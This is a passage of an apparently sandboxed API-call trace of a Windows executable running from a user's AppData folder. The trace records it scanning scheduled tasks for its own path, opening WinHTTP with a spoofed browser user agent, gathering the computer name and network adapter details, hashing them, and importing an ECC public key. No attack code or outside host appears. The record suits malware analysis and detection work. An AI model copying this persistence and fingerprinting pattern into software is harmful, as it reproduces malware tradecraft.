This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0229.671] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.671] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.671] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.671] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.671] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0229.673] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0229.673] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297050) returned 0x0 [0229.673] IRegisteredTask:get_Name (in: This=0x297050, pName=0x12dea0 | out: pName=0x12dea0*="Calibration Loader") returned 0x0 [0229.673] IRegisteredTask:get_Xml (in: This=0x297050, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n") returned 0x0 [0229.675] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.702] IUnknown:Release (This=0x297050) returned 0x0 [0229.702] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.702] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0229.703] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.703] IUnknown:Release (This=0x296ef0) returned 0x0 [0229.703] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.703] IUnknown:Release (This=0x296cf0) returned 0x0 [0229.703] TaskScheduler:IUnknown:Release (This=0x296c70) returned 0x0 [0229.703] ITaskFolderCollection:get_Item (in: This=0x296b30, index=0x12e1f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x12e1a0 | out: ppFolder=0x12e1a0*=0x296c70) returned 0x0 [0229.703] ITaskFolder:GetTasks (in: This=0x296c70, flags=1, ppTasks=0x12e020 | out: ppTasks=0x12e020*=0x296d00) returned 0x0 [0229.708] IRegisteredTaskCollection:get_Count (in: This=0x296d00, pCount=0x12e180 | out: pCount=0x12e180*=1) returned 0x0 [0229.708] IRegisteredTaskCollection:get_Item (in: This=0x296d00, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12e010 | out: ppRegisteredTask=0x12e010*=0x296e50) returned 0x0 [0229.708] IRegisteredTask:get_Name (in: This=0x296e50, pName=0x12e030 | out: pName=0x12e030*="MP Scheduled Scan") returned 0x0 [0229.708] IRegisteredTask:get_Xml (in: This=0x296e50, pXml=0x12e018 | out: pXml=0x12e018*="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n") returned 0x0 [0229.710] StrStrIW (lpFirst="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.740] IUnknown:Release (This=0x296e50) returned 0x0 [0229.740] IUnknown:Release (This=0x296d00) returned 0x0 [0229.740] ITaskFolder:GetFolders (in: This=0x296c70, flags=0, ppFolders=0x12e028 | out: ppFolders=0x12e028*=0x296d00) returned 0x0 [0229.741] ITaskFolderCollection:get_Count (in: This=0x296d00, pCount=0x12e198 | out: pCount=0x12e198*=0) returned 0x0 [0229.741] IUnknown:Release (This=0x296d00) returned 0x0 [0229.741] TaskScheduler:IUnknown:Release (This=0x296c70) returned 0x0 [0229.741] IUnknown:Release (This=0x296b30) returned 0x0 [0229.741] TaskScheduler:IUnknown:Release (This=0x296ac0) returned 0x0 [0229.741] ITaskFolderCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0xfffffffffffffffe), ppFolder=0x12e330 | out: ppFolder=0x12e330*=0x296ac0) returned 0x0 [0229.741] ITaskFolder:GetTasks (in: This=0x296ac0, flags=1, ppTasks=0x12e1b0 | out: ppTasks=0x12e1b0*=0x296b60) returned 0x0 [0229.742] IRegisteredTaskCollection:get_Count (in: This=0x296b60, pCount=0x12e310 | out: pCount=0x12e310*=1) returned 0x0 [0229.742] IRegisteredTaskCollection:get_Item (in: This=0x296b60, index=0x12e1f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12e1a0 | out: ppRegisteredTask=0x12e1a0*=0x296cc0) returned 0x0 [0229.742] IRegisteredTask:get_Name (in: This=0x296cc0, pName=0x12e1c0 | out: pName=0x12e1c0*="SvcRestartTask") returned 0x0 [0229.742] IRegisteredTask:get_Xml (in: This=0x296cc0, pXml=0x12e1a8 | out: pXml=0x12e1a8*="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n") returned 0x0 [0229.745] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.780] IUnknown:Release (This=0x296cc0) returned 0x0 [0229.780] IUnknown:Release (This=0x296b60) returned 0x0 [0229.780] ITaskFolder:GetFolders (in: This=0x296ac0, flags=0, ppFolders=0x12e1b8 | out: ppFolders=0x12e1b8*=0x296b60) returned 0x0 [0229.781] ITaskFolderCollection:get_Count (in: This=0x296b60, pCount=0x12e328 | out: pCount=0x12e328*=0) returned 0x0 [0229.781] IUnknown:Release (This=0x296b60) returned 0x0 [0229.781] TaskScheduler:IUnknown:Release (This=0x296ac0) returned 0x0 [0229.781] ITaskFolderCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000003, varVal2=0xfffffffffffffffe), ppFolder=0x12e330 | out: ppFolder=0x12e330*=0x296ac0) returned 0x0 [0229.781] ITaskFolder:GetTasks (in: This=0x296ac0, flags=1, ppTasks=0x12e1b0 | out: ppTasks=0x12e1b0*=0x296b30) returned 0x0 [0229.782] IRegisteredTaskCollection:get_Count (in: This=0x296b30, pCount=0x12e310 | out: pCount=0x12e310*=0) returned 0x0 [0229.782] IUnknown:Release (This=0x296b30) returned 0x0 [0229.782] ITaskFolder:GetFolders (in: This=0x296ac0, flags=0, ppFolders=0x12e1b8 | out: ppFolders=0x12e1b8*=0x296b30) returned 0x0 [0229.783] ITaskFolderCollection:get_Count (in: This=0x296b30, pCount=0x12e328 | out: pCount=0x12e328*=0) returned 0x0 [0229.783] IUnknown:Release (This=0x296b30) returned 0x0 [0229.783] TaskScheduler:IUnknown:Release (This=0x296ac0) returned 0x0 [0229.783] IUnknown:Release (This=0x2969b0) returned 0x0 [0229.783] TaskScheduler:IUnknown:Release (This=0x3cdf80) returned 0x0 [0229.783] GetVersionExW (in: lpVersionInformation=0x12e8e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xd, dwMinorVersion=0x2c7c70, dwBuildNumber=0x0, dwPlatformId=0x12e9a9, szCSDVersion="") | out: lpVersionInformation=0x12e8e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.783] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.2228.0 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x303d70 [0229.797] GetFileAttributesW (lpFileName="Data\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\data")) returned 0xffffffff [0229.797] CreateDirectoryW (lpPathName="Data\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\data"), lpSecurityAttributes=0x0) returned 1 [0229.798] GetVersionExW (in: lpVersionInformation=0x12e490*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x2c401c, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12e490*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.798] GetComputerNameW (in: lpBuffer=0x31b3d0, nSize=0x12e9e8 | out: lpBuffer="YKYD69Q", nSize=0x12e9e8) returned 1 [0229.798] Sleep (dwMilliseconds=0x1) [0229.813] Sleep (dwMilliseconds=0x1) [0229.829] Sleep (dwMilliseconds=0x1) [0229.844] Sleep (dwMilliseconds=0x1) [0229.860] Sleep (dwMilliseconds=0x1) [0229.876] Sleep (dwMilliseconds=0x1) [0229.891] Sleep (dwMilliseconds=0x1) [0229.907] Sleep (dwMilliseconds=0x1) [0229.928] Sleep (dwMilliseconds=0x1) [0229.938] Sleep (dwMilliseconds=0x1) [0229.954] Sleep (dwMilliseconds=0x1) [0229.969] Sleep (dwMilliseconds=0x1) [0229.985] Sleep (dwMilliseconds=0x1) [0230.001] Sleep (dwMilliseconds=0x1) [0230.016] Sleep (dwMilliseconds=0x1) [0230.032] Sleep (dwMilliseconds=0x1) [0230.047] Sleep (dwMilliseconds=0x1) [0230.063] Sleep (dwMilliseconds=0x1) [0230.078] Sleep (dwMilliseconds=0x1) [0230.094] Sleep (dwMilliseconds=0x1) [0230.110] Sleep (dwMilliseconds=0x1) [0230.125] Sleep (dwMilliseconds=0x1) [0230.141] Sleep (dwMilliseconds=0x1) [0230.156] Sleep (dwMilliseconds=0x1) [0230.172] Sleep (dwMilliseconds=0x1) [0230.188] Sleep (dwMilliseconds=0x1) [0230.203] Sleep (dwMilliseconds=0x1) [0230.219] Sleep (dwMilliseconds=0x1) [0230.234] Sleep (dwMilliseconds=0x1) [0230.250] Sleep (dwMilliseconds=0x1) [0230.266] Sleep (dwMilliseconds=0x1) [0230.281] Sleep (dwMilliseconds=0x1) [0230.297] GetAdaptersInfo (in: AdapterInfo=0x31b450, SizePointer=0x12e9e8 | out: AdapterInfo=0x31b450, SizePointer=0x12e9e8) returned 0x0 [0230.301] CryptAcquireContextW (in: phProv=0x12e840, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e840*=0x304f30) returned 1 [0230.311] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e838 | out: phHash=0x12e838) returned 1 [0230.311] CryptHashData (hHash=0x2e4ed0, pbData=0x31b45c, dwDataLen=0x194, dwFlags=0x0) returned 1 [0230.311] CryptGetHashParam (in: hHash=0x2e4ed0, dwParam=0x4, pbData=0x12e888, pdwDataLen=0x12e830, dwFlags=0x0 | out: pbData=0x12e888, pdwDataLen=0x12e830) returned 1 [0230.311] CryptGetHashParam (in: hHash=0x2e4ed0, dwParam=0x2, pbData=0x30af00, pdwDataLen=0x12e888, dwFlags=0x0 | out: pbData=0x30af00, pdwDataLen=0x12e888) returned 1 [0230.311] CryptDestroyHash (hHash=0x2e4ed0) returned 1 [0230.311] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.311] GetVersionExW (in: lpVersionInformation=0x12e710*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x90, dwBuildNumber=0x0, dwPlatformId=0x6be, szCSDVersion="") | out: lpVersionInformation=0x12e710*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0230.311] GetNativeSystemInfo (in: lpSystemInfo=0x12e6e0 | out: lpSystemInfo=0x12e6e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0230.312] NCryptOpenStorageProvider (in: phProvider=0x12ea20, pszProviderName="Microsoft Software Key Storage Provider", dwFlags=0x0 | out: phProvider=0x12ea20) returned 0x0 [0230.829] NCryptImportKey (in: hProvider=0x322ce0, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", pParameterList=0x0, phKey=0x12ea28, pbData=0x322b60, cbData=0x68, dwFlags=0x0 | out: phKey=0x12ea28) returned 0x0 [0230.831] NCryptDeleteKey (hKey=0x314310, dwFlags=0x0) returned 0x0 [0230.832] NCryptFreeObject (hObject=0x322ce0) returned 0x0 [0230.832] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\\\*", lpFindFileData=0x12dfa0 | out: lpFindFileData=0x12dfa0) returned 0x309cc0 [0230.832] FindNextFileW (in: hFindFile=0x309cc0, lpFindFileData=0x12dfa0 | out: lpFindFileData=0x12dfa0) returned 1 [0230.832] FindNextFileW (in: hFindFile=0x309cc0, lpFindFileData=0x12dfa0 | out: lpFindFileData=0x12dfa0) returned 1 [0230.832] FindNextFileW (in: hFindFile=0x309cc0, lpFindFileData=0x12dfa0 | out: lpFindFileData=0x12dfa0) returned 1 [0230.832] FindNextFileW (in: hFindFile=0x309cc0, lpFindFileData=0x12dfa0 | out: lpFindFileData=0x12dfa0) returned 0 [0230.832] FindClose (in: hFindFile=0x309cc0 | out: hFindFile=0x309cc0) returned 1 [0230.832] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.833] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.833] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x20, dwFlags=0x0) returned 1 [0230.833] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.833] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x30b1a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x30b1a0, pdwDataLen=0x12e8b8) returned 1 [0230.833] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.833] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.833] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.834] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.834] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x40, dwFlags=0x0) returned 1 [0230.834] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.834] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x30b1d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x30b1d0, pdwDataLen=0x12e8b8) returned 1 [0230.834] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.834] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.834] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.834] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.834] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x60, dwFlags=0x0) returned 1 [0230.834] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.834] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x30b200, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x30b200, pdwDataLen=0x12e8b8) returned 1 [0230.834] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.834] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.834] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.835] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.835] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x80, dwFlags=0x0) returned 1 [0230.835] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.835] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x30b170, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x30b170, pdwDataLen=0x12e8b8) returned 1 [0230.835] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.835] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.835] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.836] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.836] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0230.836] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.836] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f460, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f460, pdwDataLen=0x12e8b8) returned 1 [0230.836] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.836] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.836] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.836] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.836] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0230.836] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.836] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f4c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f4c0, pdwDataLen=0x12e8b8) returned 1 [0230.836] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.836] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.836] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.837] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.837] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0230.837] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.837] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f4f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f4f0, pdwDataLen=0x12e8b8) returned 1 [0230.837] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.837] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.837] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.838] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.838] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x100, dwFlags=0x0) returned 1 [0230.838] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.838] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f520, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f520, pdwDataLen=0x12e8b8) returned 1 [0230.838] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.838] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.838] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.838] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.838] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x120, dwFlags=0x0) returned 1 [0230.838] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.838] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f550, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f550, pdwDataLen=0x12e8b8) returned 1 [0230.839] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.839] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.839] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.839] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.839] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x140, dwFlags=0x0) returned 1 [0230.839] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.839] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f580, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f580, pdwDataLen=0x12e8b8) returned 1 [0230.839] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.839] CryptReleaseContext 